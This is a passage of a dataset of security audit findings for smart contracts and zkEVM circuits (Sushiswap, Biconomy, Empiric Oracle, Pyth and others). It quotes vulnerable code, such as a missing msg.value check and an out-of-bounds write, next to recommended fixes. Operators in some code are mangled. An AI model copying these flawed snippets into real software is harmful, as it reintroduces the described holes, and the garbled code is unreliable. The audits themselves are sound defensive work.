\u201dcondition\u201d, is_tag_in_tx_sign, meta.query_advice( lookup_conditions[&LookupCondition:)RlpSignTag], Rotation:)cur(), ), ); As the Chain ID is missing from these lookup checks, one can forge the Chain ID value for a given transaction with a existing signature. We recommend adding the mapping from TxFieldTag:)ChainID to the RLP Tag Tag:)C hainId. We also recommend ensuring that the Chain ID value in the Tx Table is looked up into the RLP Table using the above mapping. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.29 Highest tx_id must be equal to cum_num_txs in Tx Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: Tx Circuit, tx_circuit.rs Category: Underconstrained Cir- cuits Likelihood: Medium Severity: High : High Descripton In the Tx Circuit, there is a check to ensure that tx_id is less than the cum_num_txs value which is looked up from the block table. meta.create_gate(\u201dtx_id <) cum_num_txs\u201d, |meta| { let mut cb = BaseConstraintBuilder:)default(); let (lt_expr, eq_expr) = tx_id_cmp_cum_num_txs.expr(meta, None); cb.condition(is_block_num(meta), |cb| { cb.require_equal(\u201dlt or eq\u201d, sum:)expr([lt_expr, eq_expr]), true.expr()); }); cb.gate(and:)expr([ meta.query_fixed(q_enable, Rotation:)cur()), not:)expr(meta.query_advice(is_padding_tx, Rotation:)cur())), ])) }); In a valid block, the largest value of tx_id also must be equal to the value of cum_num_ txs. Currently, there is no constraint which ensures this. The cum_num_txs value can be set to be much larger than the actual set of tx_ids. We recommend adding a constraint to check that the tx_id of the last non-padding transaction in the Tx Circuit is equal to the cum_num_txs. Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "3.1 The transferred amount may not reflect msg.value", + "labels": [ + "Zellic" + ], + "body": "Target: RouteProcessor Category: Business Logic Likelihood: Medium Severity: Medium : Medium The wrapAndDistributeERC20Amounts function wraps the native tokens that were sup- plied by the user and then forwards them to the pools that RouteProcessor interacts with. Here, the msg.value parameter is not checked against the amountTotal variable, leaving room for error. function wrapAndDistributeERC20Amounts(uint256 stream, address token) private returns (uint256 amountTotal) { wNATIVE.deposit{value: msg.value}(); uint8 num = stream.readUint8(); amountTotal = 0; for (uint256 i = 0; i < num; +)i) { address to = stream.readAddress(); uint256 amount = stream.readUint(); amountTotal += amount; IERC20(token).safeTransfer(to, amount); } } This could lead to loss of funds for the end user in the case that they transfer more than the required amount. Zellic Sushiswap We recommend adding a check to ensure that msg.value =) amountTotal at the end of the function, as shown below: function wrapAndDistributeERC20Amounts(uint256 stream, address token) private returns (uint256 amountTotal) { wNATIVE.deposit{value: msg.value}(); uint8 num = stream.readUint8(); amountTotal = 0; for (uint256 i = 0; i < num; +)i) { address to = stream.readAddress(); uint256 amount = stream.readUint(); amountTotal += amount; IERC20(token).safeTransfer(to, amount); } require(msg.value =) amountTotal, \u201cRouteProcessor: invalid amount\u201d); } This issue was fixed by Sushiswap in commit 4aa4bd3. Zellic Sushiswap", + "html_url": "https://github.com/Zellic/publications/blob/master/Sushiswap Route Processor - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Arbitrary token transfers in wrapAndDistributeERC20Amounts", + "labels": [ + "Zellic" + ], + "body": "Target: RouteProcessor Category: Coding Mistakes Likelihood: Low Severity: Low : Low The wrapAndDistributeERC20Amounts function wraps and then forwards the wrapped tokens from the RouteProcessor contract to the pools that it interacts with. function wrapAndDistributeERC20Amounts(uint256 stream, address token) private returns (uint256 amountTotal) { wNATIVE.deposit{value: msg.value}(); uint8 num = stream.readUint8(); amountTotal = 0; for (uint256 i = 0; i < num; +)i) { address to = stream.readAddress(); uint256 amount = stream.readUint(); amountTotal += amount; /) @audit arbitrary `token` is passed, instead of `wNATIVE` IERC20(token).safeTransfer(to, amount); } } Due to the way the token parameter is passed to the safeTransfer function, it is pos- sible to pass an arbitrary token address to the function. This allows for anyone to send tokens on behalf of the contract. This is not a highly critical issue, as the RouteProcessor contract should, in theory, be interacted with via the Sushiswap front end, which would generate a legitimate token address in its route generation process. Moreover, it is not expected of the contract to hold any tokens, as it is designed to be used as a one-time transaction. Zellic Sushiswap The transaction is reverted, and the tokens are not sent. In some cases, it could lead to tokens up for grabs in the MEV (e.g., via front-running), should any user unknowingly transfer tokens to the RouteProcessor contract. We recommend removing the token parameter altogether. function wrapAndDistributeERC20Amounts(uint256 stream) private returns (uint256 amountTotal) { wNATIVE.deposit{value: msg.value}(); uint8 num = stream.readUint8(); amountTotal = 0; for (uint256 i = 0; i < num; +)i) { address to = stream.readAddress(); uint256 amount = stream.readUint(); amountTotal += amount; IERC20(wNATIVE).safeTransfer(to, amount); } require(msg.value =) amountTotal, \u201cRouteProcessor: invalid amount\u201d); } This issue was fixed by Sushiswap in commit 4aa4bd3. Zellic Sushiswap", + "html_url": "https://github.com/Zellic/publications/blob/master/Sushiswap Route Processor - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Missing access control revocation", + "labels": [ + "Zellic" + ], + "body": "Target: SpiceFiNFT4626 Category: Coding Mistakes Likelihood: High Severity: Medium : Medium The initialize function assigns the DEFAULT_ADMIN_ROLE to the multisig_ account passed as a parameter to the function. The address is also stored in the aptly named multisig member variable. The setMultisig function can be used by authorized callers to update the multisi g variable; however, the function does not revoke the role assigned to the former multisig address, nor does it grant the role to the new address. Rotated multisig addresses might retain unintended roles, and new multisig addresses may not be assigned the correct role. Ensure the proper roles are assigned and revoked by setMultisig. The issue is fixed as of commit 51fdc6e1; the DEFAULT_ADMIN_ROLE is revoked from the previous multisig account. Zellic Spice Finance Inc. 4 Threat Model This provides a full threat model description for various functions. As time permitted, we analyzed each function in the smart contracts and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. The absence of a threat model in this section does not necessarily suggest that a function is safe. 4.1 File: SpiceFiNFT4626 Function: previewDeposit (same as OZ ERC4626) Function: previewMint (same as OZ ERC4626) Function: previewWithdraw (same as OZ ERC4626) Function: previewRedeem (same as OZ ERC4626) Function: deposit (same as OZ ERC4626) Function: mint Intended behavior Accept the user asset and mint the shares to a tokenId of their choosing or mint a new NFT. Preconditions If the tokenId is an existing NFT, the caller has to be the owner of the NFT. Inputs tokenId \u2013 Control: Full control \u2013 Authorization: None \u2013 : The NFT token Id assets \u2013 Control: Full control Zellic Spice Finance Inc. \u2013 Authorization: None \u2013 : Amount of shares to receive Function call analysis previewMint \u2013 What is controllable?: Everything \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: The amount of asset to take weth.transferFrom \u2013 What is controllable?: Amount \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded _deposit \u2013 What is controllable?: tokenId, assets \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: redeem Intended behavior Redeem shares from a given tokenId NFT. Preconditions Must not be a revealed NFT, must be withdrawable, and caller has to own the NFT. Inputs tokenId \u2013 Control: Full control Zellic Spice Finance Inc. \u2013 Authorization: None \u2013 : The NFT token Id shares \u2013 Control: Full Control \u2013 Authorization: None \u2013 : Amount of shares to redeem receiver \u2013 Control: Full Control \u2013 Authorization: None \u2013 : The person who receives the asset Function call analysis previewRedeem \u2013 What is controllable?: Everything \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: The amount of asset to take _convertToAssets \u2013 What is controllable?: Shares \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Calculate assets with fees _withdraw \u2013 What is controllable?: tokenId, shares, receiver \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: withdraw Intended behavior Withdraw asset from a given tokenId NFT. Zellic Spice Finance Inc. Preconditions mMst not be a revealed NFT, must be withdrawable, and caller has to own the NFT. Inputs tokenId \u2013 Control: Full control \u2013 Authorization: None \u2013 : The NFT token Id asset \u2013 Control: Full Control \u2013 Authorization: None \u2013 : Amount of asset to withdraw receiver \u2013 Control: Full control \u2013 Authorization: None \u2013 : The person who receives the asset Function call analysis previewWithdraw \u2013 What is controllable?: Everything \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: The amount of asset to take _convertToAssets \u2013 What is controllable?: Shares \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Calculate assets with fees _convertToShares \u2013 What is controllable?: Assets \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Zellic Spice Finance Inc. Calculate assets with fees _withdraw \u2013 What is controllable?: tokenId, asset, receiver \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: deposit Intended behavior Accept the user asset and mint the shares to a tokenId of their choosing or mint a new NFT. Preconditions If the tokenId is an existing NFT, the caller has to be the owner of the NFT. Inputs tokenId \u2013 Control: Full control \u2013 Authorization: None \u2013 : The NFT token Id assets \u2013 Control: Full control \u2013 Authorization: None \u2013 : Amount of asset to invest Function call analysis previewDeposit \u2013 What is controllable?: Everything \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: The amount of shares to mint Zellic Spice Finance Inc. weth.transferFrom \u2013 What is controllable?: amount \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded _deposit \u2013 What is controllable?: tokenId, assets \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: deposit (strategist) Intended behavior Invest the assets of this vault into another vault. Preconditions msg.sender has to be a strategist. Inputs vault \u2013 Control: Full control \u2013 Authorization: Checks if the vault is approved, through VAULT_ROLE \u2013 : Vault to invest in assets \u2013 Control: Full control \u2013 Authorization: None \u2013 : Amount of asset to invest minShares \u2013 Control: Full control \u2013 Authorization: None \u2013 : Slippage check Zellic Spice Finance Inc. Function call analysis _checkRole \u2013 What is controllable?: Control the address, but nothing else \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Means that the address was not approved \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded asset.safeIncreaseAllowance \u2013 What is controllable?: vault, amount \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded vault.deposit \u2013 What is controllable?: assets and receiver \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Reverts if the vault doesn\u2019t have enough asset \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: mint (strategist) Intended behavior invest the assets of this vault into another vault. Preconditions msg.sender has to be a strategist. Inputs vault \u2013 Control: Full control \u2013 Authorization: Checks if the vault is approved, through VAULT_ROLE \u2013 : Vault to invest in shares \u2013 Control: Full control Zellic Spice Finance Inc. \u2013 Authorization: None \u2013 : Amount of asset to invest maxAsset \u2013 Control: Full control \u2013 Authorization: None \u2013 : Slippage check Function call analysis _checkRole \u2013 What is controllable?: Control the address, but nothing else \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Means that the address was not approved \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded asset.safeIncreaseAllowance \u2013 What is controllable?: vault, amount \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Nothing \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded vault.mint \u2013 What is controllable?: shares and receiver \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Reverts if the vault doesn\u2019t have enough asset \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: withdraw (strategist) Intended behavior Withdraw capital from invested vault. Preconditions msg.sender has to be a strategist. Zellic Spice Finance Inc. Inputs vault \u2013 Control: Full control \u2013 Authorization: Checks if the vault is approved, through VAULT_ROLE \u2013 : Vault to invest in assets \u2013 Control: Full control \u2013 Authorization: None \u2013 : Amount of asset to invest maxAsset \u2013 Control: Full control \u2013 Authorization: None \u2013 : Slippage check Function call analysis _checkRole \u2013 What is controllable?: Control the address, but nothing else \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Means that the address was not approved \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded vault.withdraw \u2013 What is controllable?: assets, receiver, owner \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Ok \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Function: redeem (strategist) Intended behavior Redeem capital from invested vault. Preconditions msg.sender has to be a strategist. Zellic Spice Finance Inc. Inputs vault \u2013 Control: Full control \u2013 Authorization: Checks if the vault is approved, through VAULT_ROLE \u2013 : Vault to invest in assets \u2013 Control: Full control \u2013 Authorization: None \u2013 : Amount of asset to invest minAssets \u2013 Control: Full control \u2013 Authorization: None \u2013 : Slippage check Function call analysis _checkRole \u2013 What is controllable?: Control the address, but nothing else \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Means that the address was not approved \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded vault.redeem \u2013 What is controllable?: assets, receiver, owner \u2013 What happens if it reverts, reenters, or does other unusual control flow?: Ok \u2013 If return value is controllable, how is it used and how can it go wrong: Discarded Zellic Spice Finance Inc. 5 Audit Results At the time of our audit, the code was not deployed to mainnet Ethereum. During our assessment on the scoped SpiceFiNFT4626 contracts, we discovered one issue of medium impact. Spice Finance Inc. acknowledged all findings and imple- mented fixes.", + "html_url": "https://github.com/Zellic/publications/blob/master/SpiceFiNFT4626 - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Module: ModuleManager.sol Function: execTransactionFromModule(address to, uint256 value, byte[] d ata, Enum.Operation operation, uint256 txGas) Available only for enabled modules. Allows a trusted module to perform execute transaction directly. Branches and code coverage (including function calls) Negative behavior", + "labels": [ + "Zellic" + ], + "body": "The caller is not a trusted module. \u25a1 Negative test The caller is the disabled module. \u25a1 Negative test Function call analysis execute(to, value, data,operation,txGas =) 0 ? gasleft() : txGas); -> del egatecall(txGas,to,add(data, 0x20),mload(data),0,0) \u2013 External/Internal? External. \u2013 Argument control? txGas, to, and data. \u2013 : Perform delegatecall of to address. execute(to, value, data,operation,txGas =) 0 ? gasleft() : txGas); -> cal l(txGas,to,value,add(data, 0x20),mload(data),0,0) \u2013 External/Internal? External. \u2013 Argument control? txGas, to, data, and value. \u2013 : Perform call of to address. Zellic Biconomy Labs Function: execTransactionFromModule(address to, uint256 value, byte[] d ata, Enum.Operation operation) The same as execTransactionFromModule(address to, uint256 value, bytes memory data, Enum.Operation operation, uint256 txGas), but additional txGas is zero.", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Smart Account - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Module: SmartAccountFactory.sol Function: deployCounterFactualAccount(address moduleSetupContract, byte [] moduleSetupData, uint256 index) Allows any users to deploy smart account contracts. Inputs", + "labels": [ + "Zellic" + ], + "body": "moduleSetupContract \u2013 Control: Full control. \u2013 Constraints: No restrictions. \u2013 : The address of the module that will be enabled and set up during the init() function call. moduleSetupData \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : Contain function signature and data for module call. index \u2013 Control: Full control. \u2013 Constraints: If the contract with the index was already deployed, the trans- action will be reverted. \u2013 : Extra salt. Branches and code coverage (including function calls) Intended branches New smart account contract was initialized properly. \u25a1 Test coverage Negative behavior Revert if index was already used by the same EOA. \u25a1 Negative test Zellic Biconomy Labs Function call analysis proxy.init(address(minimalHandler), moduleSetupContract, moduleSetupData) \u2013 External/Internal? External. \u2013 Argument control? moduleSetupContract and moduleSetupData. \u2013 : Initialize new smart account contract with required state. moduleSetupContract.call(...)),moduleSetupData, ...))) \u2013 External/Internal? External. \u2013 Argument control? moduleSetupContract and moduleSetupData. \u2013 : Call moduleSetupContract over the low-level call for the initializa- tion of the module, for example, the installation of the owner address of this smart account.", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Smart Account - Zellic Audit Report.pdf" + }, + { + "title": "4.3 Module: SmartAccount.sol Function: addDeposit() Available for anyone. Transfer native tokens provided by caller to the EntryPoint con- tracts. Function: disableModule(address prevModule, address module) Function available only for EntryPoint or self-call. Allows to disable the module ad- dress, and it cannot be used any more for validation. Function: enableModule(address module) Function available only for EntryPoint or self-call. Allows caller to enable the new address of the module. Inputs", + "labels": [ + "Zellic" + ], + "body": "module \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The address of the module used to verify user operation. Branches and code coverage (including function calls) Intended branches New module was enabled. Zellic Biconomy Labs \u25a1 Test coverage Negative behavior The caller is not entry point or this contract. \u25a1 Negative test Function call analysis _enableModule(module) \u2013 External/Internal? Internal. \u2013 Argument control? module. \u2013 : Add module address to the modules to enable. Function: executeCall(address dest, uint256 value, byte[] func) Function just calls executeCall_s1m, which is available only for EntryPoint and that is it. See executeCall_s1m description. Function: executeCall_s1m(address dest, uint256 value, byte[] func) Function available only for EntryPoint. Allows EntryPoint to perform the transaction. Inputs dest \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The arbitrary contract that will be called. value \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : Amount of native tokens will be transferred. func \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The transaction data. Contains the function that will be called. Branches and code coverage (including function calls) Negative behavior msg.sender is not EntryPoint or this contract. Zellic Biconomy Labs \u25a1 Negative test Function call analysis _call(dest, value, func) -> call( ...)), target, value, add(data, 0x20), ml oad(data), ...))) \u2013 External/Internal? External. \u2013 Argument control? target, value, and data. \u2013 : Arbitrary external call. Function: init(address handler, address moduleSetupContract, byte[] mod uleSetupData) The function is called only once during deployment from proxy contract. Allows to set up and enable the module provided by call of deployCounterFactualAccount or deployAccount of the SmartAccountFactory contract. Inputs handler \u2013 Control: Full control. \u2013 Constraints: Cannot be zero address. \u2013 : The address of the contract handling the fallback calls. moduleSetupContract \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The address of module. moduleSetupData \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The calldata for moduleSetupContract. Branches and code coverage (including function calls) Negative behavior Cannot be called twice. \u25a1 Negative test Function call analysis _initialSetupModules -> call(...)), moduleSetupContract, ...)), moduleSetupDa Zellic Biconomy Labs ta) \u2013 External/Internal? External. \u2013 Argument control? moduleSetupContract, moduleSetupData \u2013 : Calling the arbitrary moduleSetupContract contract, which should be trusted by the caller. Function: setupAndEnableModule(address setupContract, byte[] setupData) Function available only for EntryPoint or self-call. Allows caller to enable the new address of the module and call it for configuration when this is the first enabling. Inputs setupContract \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The address of the module used to verify user operation. setupData \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : Data used to configure the module. Branches and code coverage (including function calls) Intended branches New module was enabled. \u25a1 Test coverage Negative behavior The caller is not entry point or this contract. \u25a1 Negative test Function call analysis _setupAndEnableModule(setupContract, setupData) -> call( ...)), setupContra ct, ...)), add(setupData, 0x20), mload(setupData), ...))) \u2013 External/Internal? External. \u2013 Argument control? setupContract and setupData. \u2013 : Calls setupContract to configure before use. Zellic Biconomy Labs Function: updateImplementation(address _implementation) Function available only for EntryPoint or self-call. Allows to update the address of the implementation that is used by proxy contract. Inputs _implementation \u2013 Control: Full control. \u2013 Constraints: _implementation !) address(0). \u2013 : The address of the contract that will be used as smart account implementation over delegatecall by proxy contract. Branches and code coverage (including function calls) Intended branches The implementation was updated properly. \u25a1 Test coverage Negative behavior _implementation =) address(0). \u25a1 Negative test Caller is not entry point and self-call. \u25a1 Negative test _implementation is EOA. \u25a1 Negative test Function: validateUserOp(UserOperation userOp, byte[32] userOpHash, uin t256 missingAccountFunds) Function available only for EntryPoint. The function is called from the EntryPoint.hand leOps function, which can be called by any caller that should have valid user operation data. The function will revert if the module is untrusted \u2014 otherwise 0 if signature is valid or 1 if invalid. Branches and code coverage (including function calls) Negative behavior Caller is not EntryPoint contract. \u25a1 Negative test validationModule is not the enabled module. Zellic Biconomy Labs \u25a1 Negative test User operation is invalid. \u25a1 Negative test Function call analysis IAuthorizationModule(validationModule).validateUserOp(userOp, userOpHash) \u2013 External/Internal? External. \u2013 Argument control? validationModule, userOp, and userOpHash. \u2013 : If signature is valid, 0, or 1 if invalid. Can revert if signature has incorrect length or userOp.sender is zero address. Function: withdrawDepositTo(address payable withdrawAddress, uint256 am ount) Function available only for EntryPoint or self-call. Withdraw funds from the EntryPoint contract. Inputs withdrawAddress \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The received withdrawn funds. amount \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : Amount to be withdrawn. Branches and code coverage (including function calls) Intended branches withdrawAddress received the funds. \u25a1 Test coverage Negative behavior The caller is not entry point or this contract. \u25a1 Negative test Zellic Biconomy Labs Function call analysis EntryPoint.withdrawTo(withdrawAddress, amount) \u2013 External/Internal? External. \u2013 Argument control? withdrawAddress and amount. \u2013 : Transfer deposited funds from EntryPoint to withdrawAddress. Zellic Biconomy Labs 5 Audit Results At the time of our audit, the audited code was not deployed to the Ethereum Mainnet. During our assessment on the scoped Biconomy Smart Account contracts, we discov- ered one finding, which was informational in nature. Biconomy Labs acknowledged the finding and implemented a fix.", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Smart Account - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Key used in oracle entry storage is forgable by trusted pub- lisher", + "labels": [ + "Zellic" + ], + "body": "Target: oracle/library.cairo Category: Coding Mistakes Likelihood: Low Severity: High : High The oracle/library.cairo code is responsible for much of the core implementation of the oracle itself. The oracle uses \u201centries\u201d to record the current value for a given asset pair or other kinds of tracked elements. The oracle code defines a \u201cpublish entry\u201d external function that allows callers to submit an entry to be recorded. The main authorization check is done by checking that the caller\u2019s address is equal to the expected publisher address. The expected publisher address is reported by the publisher registry contract. This check ensures that this transaction can only be performed by a preconfigured publisher. While this check ensures that the caller is, indeed, a preconfigured publisher, it does not key the entry by this caller address. Entries define multiple relevant properties. Namely, entries define a timestamp, the value, a pair id, a source, and a publisher. struct Entry: member pair_id : felt member value : felt member timestamp : felt member source : felt member publisher : felt end The pair id represents a string of the pair of assets this entry tracks. For example, this could be the felt value that represents the string \u201ceth/usd\u201d. The other interesting property is the source. The source and the publisher are not necessarily the same. The publisher attests to the value of data from a particular source. Therefore, an entry submitted by a publisher could contain any source string desired. Entries are stored in a map called Oracle_entry_storage, which is keyed by two values: Zellic Empiric Network the entry\u2019s pair id and the entry\u2019s source. Because entry sources can be any value decided by the publisher and entries are not keyed by their publisher, rogue publishers can overwrite the values set by other publishers. Approved publishers that have turned rogue can set entries for arbitrary sources and key ids even if those sources are the responsibility of other publishers. Considering either keying on publisher address or tracking which sources a particular publisher is allowed to publish. This will require an additional check that the specified source is allowed to be published by the calling publisher. The issue was addressed in a later update. Zellic Empiric Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Empiric Oracle - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Publish entry does not validate caller address is not 0", + "labels": [ + "Zellic" + ], + "body": "Target: oracle/library.cairo Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational When contracts in Starknet are directly invoked, the get_caller_address function can return 0. This is a relatively common error or default pattern in Starknet and Cairo, but it can cause security issues when this behavior is unexpected, like in the case of get_caller_address. In the publish entry code of the oracle/library.cairo file, the caller address is checked against the publisher address. The publisher address is retrieved by calling into the publisher registry contract and fetching the address of the publisher with a given felt- converted string name. If the publisher specified by this string does not exist, the publisher registry will actually return 0 instead of throwing an error. func Publisher_get_publisher_address{ syscall_ptr : felt*, pedersen_ptr : HashBuiltin*, range_check_ptr }(publisher : felt) -> (publisher_address : felt): let (publisher_address) = Publisher_publisher_address_storage.read( publisher) return (publisher_address) end This is because a read with a key that does not exist will return 0 values instead of throwing an error. Because no check is performed in the publisher registry that val- idates that non-zero values for publisher addresses will be returned, this allows the oracle code to check a 0 publisher address against a potentially 0 caller address, which can occur if the contract is invoked directly with -)no_wallet. As of Starknet 0.10.0 this will not be an issue, but it is recommended to validate that the publisher registry get publisher address method does not return 0 values and/or the oracle validates the caller is not 0. If allowed, for example\u2014a pre-0.10.0 Starknet environment would allow a caller to impersonate a publisher as long as the publisher does not exist in the publisher reg- istry. In combination with a previous finding, this would allow an attacker to publish Zellic Empiric Network arbitrary entries even if they were not previously added to the registry. Validate, in either the publisher registry, that the returned publisher address is non- zero or that the caller address is not zero. The issue was addressed in a later update. Zellic Empiric Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Empiric Oracle - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Mathematical expressions could produce incorrect values", + "labels": [ + "Zellic" + ], + "body": "Target: oracle/library.cairo Category: Coding Mistakes Likelihood: Low Severity: Medium : High It was observed in the yield curve cairo code that in calculate_future_spot_yield_ point some multiplication occurs with numbers that have not been given an upper bound. While integer overflow conditions are not strictly limited to multiplication, this is where we\u2019re most likely to find valid conditions for overflow behavior. In calculate_future_spot_yield_point, a call is made to starkware.cairo.common.pow where the exponent is output_decimals + spot_decimals - future_decimals. Based on how this function is called, future_decimals can, at least, be 1. No reasonable upper bound exists for the exponent and pow, internally, performs unchecked multiplication. This means that the following expressions # Shift future/spot to the left by output_decimals + spot_decimals \u2212 future_decimals let (ratio_multiplier) = pow(10, output_decimals + spot_decimals \u2212 future_decimals) let (shifted_ratio, _) = unsigned_div_rem( future_entry.value * ratio_multiplier, spot_entry.value ) can result in integer overflow when performing the pow operation as the exponent cap is 2^251. Note that this is not 251, but 2 raised to the 251. This will easily overflow the ratio_multiplier, causing the ratio to be an unexpected value. Mathematical expressions can miscalculate, causing incorrect spot pricing. Assert that the exponent passed to pow is less than some amount. Additional, pro- vide additional assertions around entry valuation to ensure the provided number is reasonable and not at the limits of what a felt can support. Zellic Empiric Network The issue was addressed in a later update. Zellic Empiric Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Empiric Oracle - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Faulty implementation of comparison function", + "labels": [ + "Zellic" + ], + "body": "Target: lib/time_series/utils.cairo Category: Coding Mistakes Likelihood: Low Severity: Medium : Medium The are_equal function in time_series.utils incorrectly assumes that the is_nn func- tion checks if the argument is negative. According to the documentation, however, this function checks if the argument is non-negative. This leads to an incorrect imple- mentation, causing the are_equal function to return bogus values. func are_equal{range_check_ptr}(num1: felt, num2: felt) -> (_are_equal: Bool) { alloc_locals; let is_neg1 = is_nn(num1 \u2212 num2); let is_neg2 = is_nn(num2 \u2212 num1); let _are_equal = is_nn(is_neg1 + is_neg2 \u2212 1); return (_are_equal,); } As an example, the are_equal function will have the following trace when run with arguments (3, 4), wrongly returning that the numbers are equal: is_neg1 = is_nn(3 \u2212 4) => is_nn(-1) => 0; is_neg2 = is_nn(4 \u2212 3) => is_nn(1) => 1 _are_equal = is_nn(0 + 1 \u2212 1) => is_nn(0) => 1 The faulty are_equal function is used as a helper function by other statistical calcula- tion functions under time_series/, which could lead to incorrect results. Rewrite the code according to the correct specification of the is_nn function: It returns 1 when the argument is non-negative. Write more unit tests for individual library functions to catch any incorrect implemen- tations and edge cases that might not show up in an integration test. Zellic Empiric Network The issue was addressed in a later update. Zellic Empiric Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Empiric Oracle - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Incorrect use of library comparison function", + "labels": [ + "Zellic" + ], + "body": "Target: computeengines/rebasedenomination/RebaseDenomination.cairo Category: Coding Mistakes Likelihood: Low Severity: Low : Low The _decimal_div function uses the is_le function to compare the number of decimals between the numerator and the denominator. The specification of the is_le function states that it returns 1 when the first argument is less than or equal to the second argument: /) Returns 1 if a <) b (or more precisely 0 <) b - a < RANGE_CHECK_BOUND). /) Returns 0 otherwise. @known_ap_change func is_le{range_check_ptr}(a, b) -> felt { return is_nn(b \u2212 a); } The implementation of _decimal_div assumes otherwise. The is_le function will re- turn TRUE if b_decimals <) a_decimals or a_decimals >) b_decimals. This is different from the code below, which assumes that the two numbers can only be equal in the else branch. let b_fewer_dec = is_le(b_decimals, a_decimals); if (b_fewer_dec =) TRUE) { /) x > y a_to_shift = a_value; result_decimals = a_decimals; tempvar range_check_ptr = range_check_ptr; } else { /) x <) y As a result, the case when the two numbers are equal is handled by the first if branch instead of the else branch as expected by the code. The correctness of the _decimal_div function is not affected by the incorrect usage of the is_le function as the code for handling the first if branch and the equality leads to Zellic Empiric Network the same outcome. However, this same mistake may show up in other places, and such assumptions should be carefully verified before using them in code. Rearrange the if conditions so that the case of equality is handled by the if branch rather than the else branch. The issue was addressed in a later update. Zellic Empiric Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Empiric Oracle - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Out-of-bounds write in update test instruction", + "labels": [ + "Zellic" + ], + "body": "Target: oracle.c:upd_test Severity: High : High Category: Coding Mistakes Likelihood: High Pyth exposes two instructions associated with test price accounts - one to initialize them, and another to update the account\u2019s pricing information. The update instruction sets pricing, status, and confidence intervals for the test account\u2019s price components using a loop that copies over values from the instruction data to the account. This loop iterates a number of times as specified by the caller, incrementing a variable used to index into the price components. for( uint32_t i=0; i !) cmd\u2212>num_; +)i ) { pc_price_comp_t *ptr = &px->comp_[i]; ptr->latest_.status_ = PC_STATUS_TRADING; ptr->latest_.price_ = cmd->price_[i]; ptr->latest_.conf_ = cmd->conf_[i]; 